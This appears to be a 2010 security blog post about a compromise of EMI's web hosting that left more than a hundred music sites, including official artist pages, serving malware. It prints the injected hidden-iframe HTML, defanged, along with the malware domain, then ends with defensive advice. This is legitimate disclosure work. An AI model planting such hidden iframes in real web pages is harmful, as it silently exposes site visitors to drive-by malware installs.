EMI Music is one of the world’s leading music companies with many successful record labels and signed popular artists that include The Beatles, Depeche Mode, Gorillaz, Iron Maiden, Kylie Minogue, Pink Floyd, Queen, Snoop Dogg and many more. They have their own web hosting subsidiary EMIHosting.com that provides web space for EMI’s websites and many official websites of EMI artists.
In the beginning of this September EMI Hositng.com was attacked by hackers. As a result more than a hundred websites on a server with IP address of 195 .225 .83 .57 have been infected with a malicious iframe. Google’s diagnostics page for AS34401 (EMIMUSICGROUP) says:
Of the 279 site(s) we tested on this network over the past 90 days, 112 site(s), including, for example, richardhawleyforum.co.uk/, emirecords.co.uk/, emimusic.co.uk/, served content that resulted in malicious software being downloaded and installed without user consent.
Among other infected domains, we can see (all links point to Google’s diagnostic pages) EMI Classics, Virgin Classics as well as official sites of Pink Floyd, David Gilmour, Gorillaz, Massive Attack, Coldplay, Brian Ferry. Most of them have been already cleaned up and unblocked by Google. However, some sites remain blacklisted (their owners didn’t request malware review), for example, sites of Kate Bush and Ray Charles’ “Genius loves company” album.
At least 15 sites that I checked myself still contain malicious iframes in either all webpages or in certain sections of websites. As of September 25th 2010, the following sites are still dangerous for web surfers (links point to real-time Unmask Parasites reports):
Note that all infected sites have this hidden iframe from “hxxp://virtuellvorun .org/zl/s2”
and all Google diagnostic pages report the “virtuellvorun .org” domain as the source of the problem.
The actual injected HTML code is
<div style="visibility:hidden"><ifr ame src="hxxp://virtuellvorun .org/zl/s2" width=100 height=80></ifram e></div>
it can be found in different parts of web page code.
One more interesting observation is on most websites, the malicious code had been initially detected on September 5th and 6th. This is probably when the attack took place. According to Google’s Safe Browsing service, the same “virtuellvorun .org” domain was the source of infection for hacked TechCrunch sites (MobileCrunch, CrunchGear, TechCrunch Europe) exactly in the same period of time (September 6th).
Here’s what I think could happen. Around September 5th, hackers used a security hole in one of EMI hosted sites (many of them use old versions of phpBB and WordPress) to upload some backdoor scripts and/or web shells. Then they used the uploaded scripts to find more sites with weak file permissions and infect them. Then EMI hosting admins detected the hack and tried to clean up the infected sites. Unfortunately, they didn’t try to run server-wide scans and missed quite a few sites with malicious injections.
I hope this article will help EMI Hosting find and clean up those still infected sites and consider hardening their servers and refining their security policy to prevent future server-wide hacks — after all they host quite popular sites and such hacker attacks expose a lot of music fans to malware.
As you can see, even big reputable sites can distribute malware. You should be prepared that any website you visits tries to silently install something malicious on your computer. To minimize risks of such infection you should have your system (OS, browser, plugins, Flash, Java, Adobe Reader, etc) up-to-date and fully patched. Moreover, I suggest that you use NoScript on Firefox — this highly customizable extension effectively blocks any active content from untrusted locations — in this particular case your browser would simply ignore that malicious iframe.
Do you know any details about those EMI/TechCrunch hacks? What do you think about them? Your comments are welcome.